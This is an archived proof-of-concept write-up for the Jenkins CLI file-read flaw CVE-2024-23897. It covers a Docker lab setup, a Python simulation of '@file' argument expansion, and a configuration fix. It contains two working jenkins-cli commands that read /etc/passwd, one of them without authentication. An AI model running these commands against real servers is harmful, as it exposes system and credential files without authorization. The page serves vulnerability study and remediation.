PoC details: 2c363c13042f2a64acfd95182da10b3f8e34ffcf

Source
Related vulnerability
Title: Jenkins security vulnerability (CVE-2024-23897)
Description: Jenkins is an open-source application from the Jenkins project. Jenkins, an open-source automation server, provides hundreds of plugins to support building, deploying and automating any project. Jenkins 2.441 and earlier and LTS 2.426.2 and earlier contain a security vulnerability that allows an unauthenticated attacker to read files on the Jenkins controller file system.
Description
On this git you can find all information on CVE-2024-23897.
Introduction
# PoC-jenkins-rce_CVE-2024-23897.
<h2>On this git you can find all information on the CVE-2024-23897.</h2>

<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/1200px-Jenkins_logo.svg.png" alt="logo-jenkins">
</div>
<h3>Introduction</h3>

The issue, assigned the CVE identifier CVE-2024-23897, has been described as an arbitrary file read vulnerability through the built-in command line interface. The CLI command parser has a feature that replaces an @ character followed by a file path in an argument with that file's contents (expandAtFiles). This feature is enabled by default, and Jenkins 2.441 and earlier and LTS 2.426.2 and earlier do not disable it.

<h3>PoC</h3>


For this PoC, I installed Jenkins 2.426.2 with Docker to test the exploit of the vulnerability:
```
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2
```

After creating a user and a password, I downloaded the Jenkins CLI client (jenkins-cli.jar) on my attacking machine.
<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/jenkins-java.png" alt="screen1">
</div>


Then, I wrote the command for the exploit.
This command requires the credentials of a Jenkins user.
```
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
```

<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/Screenshot%20from%202024-01-27%2015-32-50.png" alt="screen2">
</div>


Another command allows displaying the first lines of a file without authentication.
```
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
```

<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/noauth.png" alt="screen3">
</div>

<h3>Fix the vulnerability</h3>

To counter this vulnerability, you need to open the Jenkins configuration file named config.xml (in my case it is located inside my Docker container, so I open a shell in the container)


<div align="center">
  <img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/jenkins-resolve.png" alt="screen4">
</div>
and add the line:

```
<expandAtFiles>false</expandAtFiles>
```
and restart Jenkins:
```
service jenkins restart
```
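To make the mechanism from the introduction and the effect of the fix above concrete, here is an added model of the `@file` expansion step, written for this page and not taken from Jenkins or from args4j. It reproduces the behaviour the README describes (an argument `@<path>` is replaced by the contents of `<path>` before the command runs) and contrasts it with the hardened setting where expansion is disabled. The file names and contents are constructed for the example, the in-memory "file system" and the whitespace tokenization are assumptions of the model, and `run_cli` is a hypothetical dispatcher used only to show which files the parser touched:

```python
"""Model of the '@file' argument expansion behind CVE-2024-23897 (added example).

Not Jenkins or args4j code. It reproduces the behaviour described on this page:
by default a CLI argument of the form '@<path>' is replaced by the contents of
<path> before the command runs; with expansion switched off the argument is
passed through literally. Files live in a constructed in-memory map so the
example runs offline.
"""
from typing import Callable, Dict, Iterable, List, Tuple

# Constructed sample files; paths and contents are made up for this example.
SAMPLE_FILES: Dict[str, str] = {
    "/tmp/args.txt": "--verbose\n--name demo\n",
    "/etc/example-secret": "placeholder-secret-line-1\nplaceholder-secret-line-2\n",
}


def read_sample_file(path: str) -> str:
    """Stand-in for reading a file from the controller's file system."""
    try:
        return SAMPLE_FILES[path]
    except KeyError:
        raise FileNotFoundError(path) from None


def expand_at_files(args: Iterable[str], enabled: bool = True,
                    read_file: Callable[[str], str] = read_sample_file) -> List[str]:
    """Return the argument list after '@path' expansion.

    enabled=True mirrors the default behaviour: every argument that starts
    with '@' is replaced by the whitespace-separated tokens of the named file
    (tokenization is an assumption of this model).
    enabled=False is the hardened setting: arguments are never expanded.
    """
    expanded: List[str] = []
    for arg in args:
        if enabled and arg.startswith("@") and len(arg) > 1:
            expanded.extend(read_file(arg[1:]).split())
        else:
            expanded.append(arg)
    return expanded


def run_cli(argv: List[str], expansion_enabled: bool = True) -> Tuple[str, List[str], List[str]]:
    """Hypothetical CLI dispatch that records which files the parser read.

    Returns (command, arguments as the command would see them, files read).
    The last element is what a defender cares about: with expansion disabled
    it is always empty, so no argument can pull a file off the controller.
    """
    files_read: List[str] = []

    def tracking_read(path: str) -> str:
        files_read.append(path)
        return read_sample_file(path)

    expanded = expand_at_files(argv, expansion_enabled, tracking_read)
    return expanded[0], expanded[1:], files_read


if __name__ == "__main__":
    # Default: the '@' argument is replaced by file contents before the command runs.
    print(run_cli(["connect-node", "@/etc/example-secret"]))
    # Hardened: the same argument reaches the command as a literal node name.
    print(run_cli(["connect-node", "@/etc/example-secret"], expansion_enabled=False))
```

The point of `run_cli` returning the list of files read is that it gives a testable property for the hardened configuration: whatever the arguments are, the list stays empty when expansion is off. The vendor fix shipped in Jenkins 2.442 and LTS 2.426.3 turns this expansion off by default, so updating is the primary remediation and the configuration change above is a stopgap.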

File snapshot

```
[4.0K] /data/pocs/2c363c13042f2a64acfd95182da10b3f8e34ffcf
├── [ 69K] 1200px-Jenkins_logo.svg.png
├── [ 11K] free-jenkins-282182.png
├── [ 55K] jenkins-java.png
├── [102K] jenkins-resolve.png
├── [ 20K] noauth.png
├── [2.3K] README.md
└── [ 82K] Screenshot from 2024-01-27 15-32-50.png

0 directories, 7 files
```
Cached for you by the Shenlong bot.
Notes
    1. It is recommended to access the PoC through the original source first.
    2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.